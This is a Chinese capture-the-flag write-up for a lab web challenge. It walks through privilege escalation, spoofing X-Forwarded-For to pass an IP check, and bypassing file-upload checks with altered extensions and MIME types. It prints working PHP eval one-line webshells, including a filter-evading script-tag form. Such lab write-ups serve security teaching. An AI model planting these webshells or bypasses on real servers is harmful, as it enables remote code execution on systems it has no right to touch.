【攻防世界】bug

垂直越权+IP绕过+文件上传

垂直越权

IP绕过

bp抓包,添加请求头X-Forwarded-For:127.0.0.1

 文件上传

文件上传绕过

1. mime检测(Content-Type)
2. 大小写绕过
3. 等价替换(php5,php3)
4. 利用JavaScript执行php代码(正常的php代码会被检测到,所以就用JavaScript来执行)

<script language='php'>....</script>

上传一个1.php 文件,出现弹窗。说明有前端校验(JavaScript),过滤了.php文件。

改后缀为.png 图片,显示

说明它不光检测后缀,还检测了内容

上传一个真的图片,显示

 绕过前端js验证:

(1)使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell

(2)首把webshell的后缀改成允许上传的‘.jpg’、‘.png’、‘.gif’ 绕过JS检测。再抓包把后缀名改成.php,即可上传webshell

抓包修改后缀为 “php5”,Content-Type 为 “image/jpeg”,并在 post 数据中将 PHP 一句话木马改为用 JavaScript 表示。

一句话木马 

如果过滤了<?php ?> 就用<script language='php'> </script>

<?php eval($_POST['a']) ?>

<script language='php'> @eval($_POST['a']) </script>

 https://www.cnblogs.com/linfangnan/p/13591331.html

【愚公系列】2023年06月 攻防世界-Web(bug)_攻防世界bug-CSDN博客

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-21 12:02:01       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-21 12:02:01       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-21 12:02:01       87 阅读
  4. Python语言-面向对象

    2024-04-21 12:02:01       96 阅读

热门阅读

  1. 进来学习K8s中的网络资源对象Service!

    2024-04-21 12:02:01       87 阅读
  2. 如何在Python中使用matplotlib库进行数据可视化?

    2024-04-21 12:02:01       40 阅读
  3. * 玩转数据魔方Plotly Express实战8例

    2024-04-21 12:02:01       37 阅读
  4. scrapy爬虫实践(部分源代码)

    2024-04-21 12:02:01       180 阅读
  5. MATLAB初学者入门(8)—— 动态规划

    2024-04-21 12:02:01       38 阅读
  6. 顺序表的就地倒置(C语言)

    2024-04-21 12:02:01       40 阅读
  7. wx小程序-input事件改变数据

    2024-04-21 12:02:01       39 阅读
  8. 数据库第五次作业官方答案

    2024-04-21 12:02:01       40 阅读